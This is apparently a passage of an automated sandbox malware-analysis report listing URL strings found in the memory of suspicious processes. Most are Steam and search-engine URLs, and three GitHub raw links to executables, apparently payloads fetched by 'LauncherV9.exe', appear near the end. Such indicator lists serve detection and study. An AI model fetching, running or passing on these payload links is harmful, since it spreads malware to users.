00000010.00000003.1571652428.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495951794.000000000124F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612167394.0000000001258000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472449424.000000000125C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.000000000125F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&a
Source: dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001261000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001264000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495951794.000000000124F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612167394.0000000001258000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472449424.000000000125C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001256000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=XfYrwi9zUC4b&l=
Source: dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001261000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001264000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495951794.000000000124F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612167394.0000000001258000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472449424.000000000125C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001256000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=engli
Source: dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=47omfdMZRDiz&l=engli
Source: dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=iGFW_JMULCcZ&
Source: jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001261000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001264000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001269000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495951794.000000000124F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612167394.0000000001258000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472449424.000000000125C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.000000000125F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l
Source: dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&amp
Source: jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001261000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001264000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495951794.000000000124F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612167394.0000000001258000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472449424.000000000125C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.000000000125F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcD
Source: dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=Opxzx_tYaANk&amp
Source: jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001261000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001264000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586774168.000000000401C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001269000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571451074.000000000401C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495951794.000000000124F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612167394.0000000001258000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1611173934.000000000400E000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472449424.000000000125C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.000000000125F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=G3UTKgHH4xLD&l=engl
Source: dll.exe, 00000010.00000003.1610907365.0000000001256000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=nc69vwog8R9p&l=
Source: jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001261000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001264000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586774168.000000000401C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001269000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571451074.000000000401C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495951794.000000000124F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612167394.0000000001258000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1611173934.000000000400E000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472449424.000000000125C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.000000000125F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=sd6kCnGQW5Ji&
Source: jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001261000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001264000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001269000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495951794.000000000124F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612167394.0000000001258000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1611173934.000000000400E000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472449424.000000000125C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.000000000125F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=n4_f9JKDa7wP&
Source: jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
Source: jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001261000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001264000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495951794.000000000124F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612167394.0000000001258000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472449424.000000000125C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.000000000125F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S
Source: jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001261000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001264000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495951794.000000000124F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612167394.0000000001258000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472449424.000000000125C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.000000000125F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=oQ1d_VAfa_o
Source: jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612167394.0000000001258000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001256000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
Source: jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001261000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001264000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495951794.000000000124F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612167394.0000000001258000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472449424.000000000125C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.000000000125F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&
Source: dll.exe, 00000010.00000003.1449202247.0000000004118000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: dll.exe, 00000010.00000003.1449202247.0000000004118000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabv209h
Source: dll.exe, 00000010.00000003.1449202247.0000000004118000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: dll.exe, 00000010.00000003.1449202247.0000000004118000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: LauncherV9.exe	String found in binary or memory: https://github.com/deripascod/coderoom/raw/refs/heads/main/Service.exe
Source: LauncherV9.exe	String found in binary or memory: https://github.com/deripascod/coderoom/raw/refs/heads/main/mtohpasekfaddd.exe
Source: LauncherV9.exe	String found in binary or memory: https://github.com/deripascod/coderoom/raw/refs/heads/main/opyksdkawddd.exe
Source: dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
